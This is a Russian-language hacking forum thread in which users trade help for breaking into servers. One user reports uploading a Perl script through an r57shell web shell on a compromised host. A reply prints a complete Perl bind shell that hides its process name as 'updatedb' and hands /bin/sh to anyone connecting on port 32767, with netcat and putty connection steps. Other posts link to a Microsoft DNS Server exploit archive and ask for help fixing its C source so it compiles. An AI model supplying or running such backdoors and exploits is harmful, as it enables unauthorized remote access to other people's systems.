gcc забеги на http://www.milw0rm.com/ там много чево есть практически под всё и временами даже рабочее =)))
2ground_zero, спасибо, но я просил не сайт с кучей сплоетов, а реально проверенный кем то из форумчан код. =) Могу вас заверить, что всю ночь до этого гуглил в поисках сабжа. И на милворме тоже был. причем в первую очередь. P.S. В данном случае еще и архитектура sparc =)
не запускается perl bind_port.pl вот решил заняться и сразу проб. незнал где спросить(в каком топике)решил тут короче есть шелл r57shell 1.31 с правами на запись я перехожу в папку sources и заливаю bind_port.pl потом выполняю команду perl bind_port.pl и жду жду и жду!и не че !зависло .пишет ожидает ответа с www..... в чём проблема? подскажите! может что-то не правильно делаю?
perl bind_port.pl ip port и еще у себя не забудь откріть порт с помощью нет какта -l -p port .И указывай реальный свой ip а НЕ прокси
та тут вобше не выполняется perl или с начало надо на нет скане а потом пёрл-бин запускать подскажите плызз
bind.pl perl /путь_до_скрипта/bind.pl потом с помощью putty или тот же NetCat => конектишься PHP: #!/usr/bin/perl $port = 32767; $port = $ARGV[0] if $ARGV[0]; exit if fork; $0 = "updatedb" . " " x100; $SIG{CHLD} = 'IGNORE'; use Socket; socket(S, PF_INET, SOCK_STREAM, 0); setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1); bind(S, sockaddr_in($port, INADDR_ANY)); listen(S, 50); while(1) { accept(X, S); unless(fork) { open STDIN, "<&X"; open STDOUT, ">&X"; open STDERR, ">&X"; close X; exec("/bin/sh"); } close X; } NetCat => ip_адресс_ресурса 32767 (enter) putty => Host Name (or IP address) там пишим IP_адрес_ресурса(можно и просто адресс ресурса) => Port 32767 => OPEN скрин
Есть сплоент на С Лежит тут (скачал только по первой сссылке) http://www.514.es/Microsoft_Dns_Server_Exploit.zip http://www.48bits.com/exploits/dnsxpl.rar http://www.milw0rm.com/sploits/04152007-dnsxpl.rar (в архиве 4 файла Makefile, dnsxpl.Acf, dnsxplc.c, dnsxpl.Idl) Вопрос: я локально его не соберу у себя на компе под виндой? lcc-win32 ? (http://www.cs.virginia.edu/~lcc-win32/lccwin32.exe) Пробовал компилить выдаёт 260 ошибок. Пробовал переименовать dnsxpl.Idl в dnsxpl.h в папке includ - всё равно ошибки. P.S. Он наверно для никсов (исходник то, раз makefile есть) и я зря под виндой пытаюсь ?
Этот эксплоит сосвем не для *nix. собирается, по идее, он вполне нормально под Windows. dnsxpl.Idl - это файл interface defenition language (языка описания интерфейса). А насчёт makefile - жжоте =) Кто ж сказал что если makefile, то под никсы... UPD: однако собрать у меня тоже не получилось. Кроме того смущает наличие в сырцах: #include "dnsxpl.h" который отсутствует в архиве.
Агррр... сам догадаешься или подсказать?! dnsxpl сокращение от DNS EXPLOIT. На самом деле эта библиотека там нах ненужна. Прототипы функций уже указанны.
Я вот не мойму, кроме ShadOS, исходники кто-нибудь посмотрел ? Я Си в школе узучал ещё и то поверхностно, щас даже синтаксис плохо помню, но, посмотрев код, там любой дурак (хоть кто более-менее знаком с программированием, поймёт, что что-то не так с dnsxpl.h. Придётся править сплоит самому полностю... (хотя бы добьюсь чтоб скомпилировался). В определении переменных - тоже ошибки, да и не соответствие типов имеет место... Где ВЫ кодеры на Cи - помогите сплоит подправить...
